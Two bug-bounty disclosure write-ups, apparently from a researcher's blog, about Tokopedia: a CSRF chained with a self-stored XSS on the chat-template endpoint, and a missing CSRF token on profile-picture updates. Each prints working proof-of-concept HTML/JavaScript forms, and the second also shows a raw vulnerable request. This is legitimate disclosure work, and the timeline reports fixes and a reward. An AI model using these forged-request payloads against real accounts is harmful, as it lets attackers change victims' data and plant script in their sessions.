Chaining CSRF With Self-Stored XSS On Tokopedia

Summary :

At the first time, I found Self-Stored XSS on Tokopedia in their template message, In Tokopedia have feature template message to chat seller with common question like “This Goods Is Ready, What Is The Variant color, and etc”. User can set the template message by their self, and I try to insert the payload XSS on the template message , and when I open the message, the XSS will be pop up, And I assume this is Self-Stored XSS. And after that I think if Self-Stored XSS not high enough because the user must be input the payload to their template. And I try to dig the Request And I found some JSON request without Token on their endpoint, and the content-type not checked by their system and I think it will be Valid CSRF. So, I try to chain that bug in one action.

Step to reproduce :

  • Create .html code like this :
<title>CSRF To XSS on tokopedia</title>
<script>
function getMe(){
// retrieve page content
var xhr = new XMLHttpRequest();
// now execute the CSRF attack
xhr.open("POST",
"https://chat.tokopedia.com/tc/v1/update_chat_templates", true);
xhr.withCredentials="true";

xhr.setRequestHeader("Content-type", "application/x-www-form-
urlencoded");

xhr.send('{"is_enable":true,"templates":["Bisa dikirim hari ini
ga?","Terima kasih!","<script>alert(document.domain);//"]}');
}
</script><center>
<h1>CSRF To XSS On tokopedia</h1>
<button onclick="getMe();">Xploit Kuyy</button>
</center>

The code will be send request to https://chat.tokopedia.com/tc/v1/update_chat_templates endpoint to add template message [“Bisa dikirim hari ini ga?”,”Terima kasih!”,”<script>alert(document.domain);//”] . Who included by Payload XSS.

So, when victim visit that link,  will be added payload XSS to their template message, and when victim try to chat with some seller, the XSS will be execute.

Video :

Timeline :

  • Sun, Feb 25, 2018 at 2:31 PM : Report Send
  • Sun, Feb 25, 2018 at 3:34 PM : Tokopedia Team answer will investigate
  • Mon, Feb 26, 2018 at 10:11 AM : Tokopedia Team Mark as Duplicate the XSS ( Found By Internal Team ) and CSRF mark as LOW Severity
  • Tue, Feb 27, 2018 at 9:09 AM : Try to explain the CSRF to get Medium Severity >.<
  • Tue, Feb 27, 2018 at 10:52 AM : Tokopedia Team Mark XSS & CSRF Valid with Medium Severity because the endpoint is different with internal team report
  • Thu, Mar 1, 2018 at 9:57 PM : Tokopedia Fixed The XSS , and tell CSRF not be fixed because the endpoint will changed soon.
  • Wed, Mar 21, 2018 : Rewarded! Yay!

Thanks.

Original Report [ID] : https://drive.google.com/file/d/0B3hUlq3mDkikVXRWdEdBalpmZVlncFFqU3JXSFpFTkFnSGkw/view

Missing CSRF Token On Change Picture Request [Tokopedia.com]

Hi,

Actually i found many CSRF issue on tokopedia, but i just write this on my blog if you want to see all of them just go to my old blog : http://v1nsh4n.blogspot.co.id/search/label/Tokopedia

Description

This bug because when change picture there’s no CSRF token to cover it.

Vuln Request

POST /ajax/people-4.pl HTTP/1.1
Host: www.tokopedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Referer: https://www.tokopedia.com/people/9946238/edit
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 526
Cookie: <somecookie>
Connection: close

file_path=https%3A%2F%2Fecs7.tokopedia.net%2Fimg%2Fcache%2F300%2Fuser-1%2F2017%2F4%2F7%2F9946238%2F9946238_7ac0357f-05f7-4f32-92a7-b69b9b23956c.png&file_th=https%3A%2F%2Fecs7.tokopedia.net%2Fimg%2Fcache%2F100-square%2Fuser-1%2F2017%2F4%2F7%2F9946238%2F9946238_7ac0357f-05f7-4f32-92a7-b69b9b23956c.png&message_status=0&pic_obj=eyJzZXJ2ZXJfaWQiOiI1MCIsImZpbGVfcGF0aCI6InVzZXItMS8yMDE3LzQvNy85OTQ2MjM4IiwicGljIjoiOTk0NjIzOF83YWMwMzU3Zi0wNWY3LTRmMzItOTJhNy1iNjliOWIyMzk1NmMucG5nIn0%3D&success=1&action=event_upload_profile_picture

Poc Code:

<script>
      function getMe(){
        // retrieve page content
        var xhr = new XMLHttpRequest();

        // now execute the CSRF attack
        xhr.open("POST", "https://www.tokopedia.com/ajax/people-4.pl", true);
        xhr.withCredentials="true";
        xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        xhr.send('file_path=https%3A%2F%2Fecs7.tokopedia.net%2Fimg%2Fcache%2F300%2Fuser-1%2F2017%2F4%2F7%2F9946238%2F9946238_7ac0357f-05f7-4f32-92a7-b69b9b23956c.png&file_th=https%3A%2F%2Fecs7.tokopedia.net%2Fimg%2Fcache%2F100-square%2Fuser-1%2F2017%2F4%2F7%2F9946238%2F9946238_7ac0357f-05f7-4f32-92a7-b69b9b23956c.png&message_status=0&pic_obj=eyJzZXJ2ZXJfaWQiOiI1MCIsImZpbGVfcGF0aCI6InVzZXItMS8yMDE3LzQvNy85OTQ2MjM4IiwicGljIjoiOTk0NjIzOF83YWMwMzU3Zi0wNWY3LTRmMzItOTJhNy1iNjliOWIyMzk1NmMucG5nIn0%3D&success=1&action=event_upload_profile_picture');
        }
</script>
<button onclick="getMe();">Let's Rock</button>

Note: file_path is another user photo

Step to reproduce:

  • Save Code .html
  • Click `Lets Rock`
  • Photo will be update with photo from file_path

Video : https://youtu.be/jNE2ECG9DRQ